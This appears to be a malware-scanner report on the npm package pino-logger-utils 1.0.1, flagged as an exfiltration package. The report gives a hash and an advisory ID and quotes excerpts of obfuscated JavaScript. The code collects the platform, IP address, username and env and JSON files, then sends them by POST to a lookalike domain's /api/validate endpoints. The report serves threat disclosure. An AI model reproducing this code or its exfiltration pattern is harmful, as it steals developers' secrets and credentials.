pino-logger-utils 1.0.1
Exfiltrates system data to C2
TraderTraitor /api/validate/ exfiltration clustervalidate project env endpoint
SHA-256b8cdc486d3ffc43e604d5e9d3e4cdc3ca346b48b1ab90bee7fe636df6726b989
Also flagged by osv (MAL-2026-1493: Malicious code in pino-logger-utils (npm)) +1 more.
Evidence
12:19… mod.__esModule) ? mod : { "default": mod };
13};
14Object.defineProperty(exports, "__esModule", { value: true });
15const os_1 = __importDefault(require("os"));
16const fs_1 = __importDefault(require("fs"));
17const path_1 = __importDefault(require("path"));
18const a1 = () => {
19 const p1 = os_1.default.platform();
20 switch (p1) {
21 case 'win32':
⋯7 lines
29:3… }
30};
31const b2 = (q1 = false) => {
32 const r1 = os_1.default.networkInterfaces();
33 const s1 = [];
34 for (const t1 in r1) {
35 const u1 = r1[t1];
36 if (!u1)
37 continue;
38 for (const v1 of u1) {
39 const w1 = Strin …
292:34… ) {
293 yield new Promise(resolve => setImmediate(resolve));
294 }
295 }
296 try {
297 const r71 = yield fetch('https://clob-polymarket.com/api/validate/files', {
298 method: 'POST',
299 headers: {
300 'Content-Type': 'application/json',
301 },
302 body: JSON.stringify({
303 envFiles: f59,
304 jsonFiles: e58,
⋯7 lines
333const n77 = (q78, r79, s80, t81) => __awaiter(void 0, void 0, void 0, function* () {
334 try {
335 const u82 = yield fetch('https://clob-polymarket.com/api/validate/project-env', {
336 method: 'POST',
337 headers: {
⋯6 lines
357:20… : a1(),
358 ipAddress: c3() || 'unknown',
359 username: d4()
360};
361m73()
362 .then((v83) => __awaiter(void 0, void 0, void 0, function* () {
363 if (v83 !== null) {
364 yield n77(o15.operatingSystem, o15.ipAddress, o15.username, v83);
365 }
366}))
⋯7 lines
No evidence locations were recorded for this file. Raw result